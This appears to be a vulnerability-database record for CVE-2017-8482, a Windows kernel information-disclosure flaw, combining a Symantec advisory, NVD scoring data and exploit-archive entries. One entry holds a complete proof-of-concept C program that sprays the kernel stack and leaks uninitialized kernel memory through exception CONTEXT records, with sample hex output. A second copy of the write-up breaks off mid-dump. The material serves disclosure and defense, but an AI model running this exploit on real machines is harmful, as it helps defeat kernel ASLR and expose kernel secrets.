Microsoft Windows Kernel CVE-2017-8482 Local Information Disclosure Vulnerability
2017-06-13T00:00:00
ID SMNTC-98858 Type symantec Reporter Symantec Security Response Modified 2017-06-13T00:00:00
Description
Description
Microsoft Windows is prone to a local information-disclosure vulnerability. A local attacker can leverage this issue to disclose sensitive information that may aid in further attacks.
Technologies Affected
Microsoft Windows 10 Version 1607 for 32-bit Systems
Microsoft Windows 10 Version 1607 for x64-based Systems
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 10 version 1511 for 32-bit Systems
Microsoft Windows 10 version 1511 for x64-based Systems
Microsoft Windows 10 version 1703 for 32-bit Systems
Microsoft Windows 10 version 1703 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for x64-based Systems
Microsoft Windows RT 8.1
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2016
Recommendations
Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.
Ensure that only trusted users have local, interactive access to affected computers.
Updates are available. Please see the references or vendor advisory for more information.
{"id": "SMNTC-98858", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Windows Kernel CVE-2017-8482 Local Information Disclosure Vulnerability", "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. A local attacker can leverage this issue to disclose sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "published": "2017-06-13T00:00:00", "modified": "2017-06-13T00:00:00", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98858", "reporter": "Symantec Security Response", "references": [], "cvelist": ["CVE-2017-8482"], "lastseen": "2018-03-14T22:42:53", "viewCount": 2, "enchantments": {"score": {"value": 2.7, "vector": "NONE", "modified": "2018-03-14T22:42:53", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-8482"]}, {"type": "exploitdb", "idList": ["EDB-ID:42220"]}, {"type": "zdt", "idList": ["1337DAY-ID-28004"]}, {"type": "myhack58", "idList": ["MYHACK58:62201787028"]}, {"type": "seebug", "idList": ["SSV:96721"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811164", "OPENVAS:1361412562310811196", "OPENVAS:1361412562310811167", "OPENVAS:1361412562310811178", "OPENVAS:1361412562310811168", "OPENVAS:1361412562310811154", "OPENVAS:1361412562310811165", "OPENVAS:1361412562310811163", "OPENVAS:1361412562310811173", "OPENVAS:1361412562310811171"]}, {"type": "kaspersky", "idList": ["KLA11048", "KLA11039", "KLA11842"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_JUN_4022725.NASL", "SMB_NT_MS17_JUN_4022714.NASL", "SMB_NT_MS17_JUN_4022727.NASL", "SMB_NT_MS17_JUN_4022719.NASL", "SMB_NT_MS17_JUN_4022715.NASL", "SMB_NT_MS17_JUN_4022724.NASL", "SMB_NT_MS17_JUN_WIN2008.NASL", "SMB_NT_MS17_JUN_4022726.NASL"]}, {"type": "talosblog", "idList": ["TALOSBLOG:212BF0D0902B16A1E3C6ABB19FCEB336"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:7C04AD3395CF22028CC84BEFD34A2090"]}], "modified": "2018-03-14T22:42:53", "rev": 2}, "vulnersScore": 2.7}, "affectedSoftware": [{"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 R2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1703 for x64-based Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2016 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1703 for 32-bit Systems "}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}]}
{"cve": [{"lastseen": "2020-10-03T13:07:50", "description": "The kernel in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an authenticated attacker to obtain information via a specially crafted application. aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-8492, CVE-2017-8491, CVE-2017-8490, CVE-2017-8489, CVE-2017-8488, CVE-2017-8485, CVE-2017-8483, CVE-2017-8480, CVE-2017-8479, CVE-2017-8478, CVE-2017-8476, CVE-2017-8474, CVE-2017-8469, CVE-2017-8462, CVE-2017-0300, CVE-2017-0299, and CVE-2017-0297.", "edition": 3, "cvss3": {"exploitabilityScore": 1.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-06-15T01:29:00", "title": "CVE-2017-8482", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8482"], "modified": "2019-03-18T21:00:00", "cpe": ["cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2017-8482", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8482", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-04-12T03:54:44", "edition": 1, "description": "Exploit for windows platform in category dos / poc", "published": "2017-06-21T00:00:00", "title": "Microsoft Windows - nt!KiDispatchException Kernel Stack Memory Disclosure in Exception Handling Expl", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8482"], "modified": "2017-06-21T00:00:00", "href": "https://0day.today/exploit/description/28004", "id": "1337DAY-ID-28004", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1177\r\n \r\nAccording to our tests, the generic exception dispatching code present in the Windows kernel (Windows 7-10) discloses portions of uninitialized kernel stack memory to user-mode clients via the CONTEXT structure set up for the ring-3 exception handlers.\r\n \r\nThe attached proof-of-concept program can be used to reproduce the issue. It works by first spraying a full page of the kernel stack with a 0x41 byte ('A') using the nt!NtMapUserPhysicalPages system call (see [1]), then also spraying a page of user-mode stack (to recognize any false-positives) with a 0x78 ('x') byte, followed by raising an exception with a RaiseException() call and dumping the contents of the CONTEXT structure provided to the unhandled exception filter function. After running the program, we should observe the 'A' byte on output in place of disclosed kernel memory.\r\n \r\nOn most tested platforms (Windows 7 64-bit, Windows 10 32/64-bit), running the 32-bit proof-of-concept program reveals 4 bytes of kernel stack memory at offset 0x88 of the structure. An example output is as follows:\r\n \r\n--- cut ---\r\n00000000: 7f 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000010: 00 00 00 00 00 00 00 00 00 00 00 00 7f 02 00 00 ................\r\n00000020: 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 ................\r\n00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000080: 00 00 00 00 00 00 00 00[41 41 41 41]2b 00 00 00 ........AAAA+...\r\n00000090: 53 00 00 00 2b 00 00 00 2b 00 00 00 50 fe 32 00 S...+...+...P.2.\r\n000000a0: 84 fd 32 00 00 e0 fd 7e 00 00 00 00 85 3c 1d 59 ..2....~.....<.Y\r\n000000b0: 1c fd 32 00 6c fd 32 00 4f c5 72 75 23 00 00 00 ..2.l.2.O.ru#...\r\n000000c0: 46 02 00 00 1c fd 32 00 2b 00 00 00 7f 02 00 00 F.....2.+.......\r\n000000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000000e0: 00 00 00 00 80 1f 00 00 ff ff 00 00 00 00 00 00 ................\r\n000000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000002a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000002b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000002c0: 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ................\r\n--- cut ---\r\n \r\nOffset 0x88 of the CONTEXT structure on x86 corresponds to the 32-bit CONTEXT.FloatSave.Cr0NpxState field, which appears to remain in an uninitialized state before being copied to user-mode. We have tested that with the kernel stack spraying disabled, these bytes contain varying values originating from the kernel memory space.\r\n \r\nOn Windows 7 32-bit, we're observing a slightly different output:\r\n \r\n--- cut ---\r\n00000000: 7f 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000010: 00 00 00 00 00 00 00 00 00 00 00 00 7f 02 00 00 ................\r\n00000020: 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 ................\r\n00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000090: 3b 00 00 00 23 00 00 00 23 00 00 00 0c fe 2a 00 ;...#...#.....*.\r\n000000a0: 40 fd 2a 00 00 f0 fd 7f 74 6c 8e 77 89 bb c8 38 @.*.....tl.w...8\r\n000000b0: d8 fc 2a 00 28 fd 2a 00 5d 84 c3 75 1b 00 00 00 ..*.(.*.]..u....\r\n000000c0: 46 02 00 00 d8 fc 2a 00 23 00 00 00 7f 02 00 00 F.....*.#.......\r\n000000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000000e0: 00 00 00 00 80 1f 00 00 ff ff 00 00 00 00 00 00 ................\r\n000000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000002a0: 00 00 00 00 00 00 00 00 00 00 00 00 41 41 41 41 ............AAAA\r\n000002b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n000002c0: 41 41 41 41 41 41 41 41 41 41 41 41 ?? ?? ?? ?? AAAAAAAAAAAA....\r\n--- cut ---\r\n \r\nHere, we can see that 32 bytes from the kernel stack are leaked at the end of the CONTEXT structure, which correspond to the last bytes of the CONTEXT.ExtendedRegisters array. We have confirmed that when the spraying function is not invoked, this memory region discloses valid kernel-mode pointers.\r\n \r\nRepeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.\r\n*/\r\n \r\n#include <Windows.h>\r\n#include <cstdio>\r\n \r\nextern \"C\"\r\nULONG WINAPI NtMapUserPhysicalPages(\r\n PVOID BaseAddress,\r\n ULONG NumberOfPages,\r\n PULONG PageFrameNumbers\r\n);\r\n \r\nVOID PrintHex(PBYTE Data, ULONG dwBytes) {\r\n for (ULONG i = 0; i < dwBytes; i += 16) {\r\n printf(\"%.8x: \", i);\r\n \r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes) {\r\n printf(\"%.2x \", Data[i + j]);\r\n }\r\n else {\r\n printf(\"?? \");\r\n }\r\n }\r\n \r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {\r\n printf(\"%c\", Data[i + j]);\r\n }\r\n else {\r\n printf(\".\");\r\n }\r\n }\r\n \r\n printf(\"\\n\");\r\n }\r\n}\r\n \r\nVOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {\r\n for (ULONG i = 0; i < size; i++) {\r\n ptr[i] = byte;\r\n }\r\n}\r\n \r\nVOID SprayKernelStack() {\r\n // Buffer allocated in static program memory, hence doesn't touch the local stack.\r\n static BYTE buffer[4096];\r\n \r\n // Fill the buffer with 'A's and spray the kernel stack.\r\n MyMemset(buffer, 'A', sizeof(buffer));\r\n NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);\r\n \r\n // Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.\r\n MyMemset(buffer, 'B', sizeof(buffer));\r\n}\r\n \r\nVOID SprayUserStack() {\r\n // Buffer allocated from the user-mode stack.\r\n BYTE buffer[4096];\r\n MyMemset(buffer, 'x', sizeof(buffer));\r\n}\r\n \r\nLONG WINAPI MyUnhandledExceptionFilter(\r\n _In_ struct _EXCEPTION_POINTERS *ExceptionInfo\r\n ) {\r\n PrintHex((PBYTE)ExceptionInfo->ContextRecord, sizeof(CONTEXT));\r\n return EXCEPTION_CONTINUE_EXECUTION;\r\n}\r\n \r\nint main() {\r\n SetUnhandledExceptionFilter(MyUnhandledExceptionFilter);\r\n \r\n SprayKernelStack();\r\n SprayUserStack();\r\n \r\n RaiseException(1337, 0, 0, NULL);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/28004"}], "exploitdb": [{"lastseen": "2017-06-21T20:15:12", "description": "Microsoft Windows - 'nt!KiDispatchException' Kernel Stack Memory Disclosure in Exception Handling. CVE-2017-8482. Dos exploit for Windows platform", "published": "2017-06-21T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - 'nt!KiDispatchException' Kernel Stack Memory Disclosure in Exception Handling", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8482"], "modified": "2017-06-21T00:00:00", "id": "EDB-ID:42220", "href": "https://www.exploit-db.com/exploits/42220/", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1177\r\n\r\nAccording to our tests, the generic exception dispatching code present in the Windows kernel (Windows 7-10) discloses portions of uninitialized kernel stack memory to user-mode clients via the CONTEXT structure set up for the ring-3 exception handlers.\r\n\r\nThe attached proof-of-concept program can be used to reproduce the issue. It works by first spraying a full page of the kernel stack with a 0x41 byte ('A') using the nt!NtMapUserPhysicalPages system call (see [1]), then also spraying a page of user-mode stack (to recognize any false-positives) with a 0x78 ('x') byte, followed by raising an exception with a RaiseException() call and dumping the contents of the CONTEXT structure provided to the unhandled exception filter function. After running the program, we should observe the 'A' byte on output in place of disclosed kernel memory.\r\n\r\nOn most tested platforms (Windows 7 64-bit, Windows 10 32/64-bit), running the 32-bit proof-of-concept program reveals 4 bytes of kernel stack memory at offset 0x88 of the structure. An example output is as follows:\r\n\r\n--- cut ---\r\n00000000: 7f 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000010: 00 00 00 00 00 00 00 00 00 00 00 00 7f 02 00 00 ................\r\n00000020: 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 ................\r\n00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000080: 00 00 00 00 00 00 00 00[41 41 41 41]2b 00 00 00 ........AAAA+...\r\n00000090: 53 00 00 00 2b 00 00 00 2b 00 00 00 50 fe 32 00 S...+...+...P.2.\r\n000000a0: 84 fd 32 00 00 e0 fd 7e 00 00 00 00 85 3c 1d 59 ..2....~.....<.Y\r\n000000b0: 1c fd 32 00 6c fd 32 00 4f c5 72 75 23 00 00 00 ..2.l.2.O.ru#...\r\n000000c0: 46 02 00 00 1c fd 32 00 2b 00 00 00 7f 02 00 00 F.....2.+.......\r\n000000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000000e0: 00 00 00 00 80 1f 00 00 ff ff 00 00 00 00 00 00 ................\r\n000000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000002a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000002b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000002c0: 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ................\r\n--- cut ---\r\n\r\nOffset 0x88 of the CONTEXT structure on x86 corresponds to the 32-bit CONTEXT.FloatSave.Cr0NpxState field, which appears to remain in an uninitialized state before being copied to user-mode. We have tested that with the kernel stack spraying disabled, these bytes contain varying values originating from the kernel memory space.\r\n\r\nOn Windows 7 32-bit, we're observing a slightly different output:\r\n\r\n--- cut ---\r\n00000000: 7f 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000010: 00 00 00 00 00 00 00 00 00 00 00 00 7f 02 00 00 ................\r\n00000020: 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 ................\r\n00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 